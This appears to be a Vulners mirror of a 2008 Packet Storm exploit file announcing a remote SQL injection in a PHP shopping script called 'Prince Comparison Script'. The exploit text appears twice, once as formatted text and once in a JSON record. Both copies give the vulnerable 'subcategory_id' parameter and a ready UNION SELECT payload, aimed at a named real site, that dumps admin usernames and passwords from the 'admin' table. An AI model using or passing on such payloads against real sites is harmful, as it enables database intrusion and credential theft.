Search...

rakhi-sql.txt

2008-11-29T00:00:00

ID PACKETSTORM:72372
Type packetstorm
Reporter XaDoS
Modified 2008-11-29T00:00:00

Description

                                        
                                            `[■] Prince Comparison Script : Shopping card &lt;= Rem0tE $ql Injection  
  
&gt;@.@&lt;  
  
&gt; AuToR: XaDoS  
&gt; Contact M&: xados [at] hotmail [dot] it  
&gt; B§g: Remote Sql inJection  
&gt; SIte vuln: http://willscript.com/rjbike_new/index.php  
  
&gt;@.@&lt;  
  
  
  
[■] ExPL0iT:  
  
|: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL]  
  
  
  
[■] D£M0:   
  
|: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin--  
  
(you see the username and password of adm in the title of one product)  
  
[■] Th4nKs::  
  
\&gt; str0ke &lt;/  
\&gt; OnlY me ( no help for this ) ;-) &lt;/  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:72372", "type": "packetstorm", "bulletinFamily": "exploit", "title": "rakhi-sql.txt", "description": "", "published": "2008-11-29T00:00:00", "modified": "2008-11-29T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/72372/rakhi-sql.txt.html", "reporter": "XaDoS", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:28:13", "viewCount": 1, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:28:13", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:13", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/72372/rakhi-sql.txt", "sourceData": "`[\u25a0] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection \n \n>@.@< \n \n> AuToR: XaDoS \n> Contact M&: xados [at] hotmail [dot] it \n> B\u00a7g: Remote Sql inJection \n> SIte vuln: http://willscript.com/rjbike_new/index.php \n \n>@.@< \n \n \n \n[\u25a0] ExPL0iT: \n \n|: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL] \n \n \n \n[\u25a0] D\u00a3M0: \n \n|: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin-- \n \n(you see the username and password of adm in the title of one product) \n \n[\u25a0] Th4nKs:: \n \n\\> str0ke </ \n\\> OnlY me ( no help for this ) ;-) </ \n \n`\n"}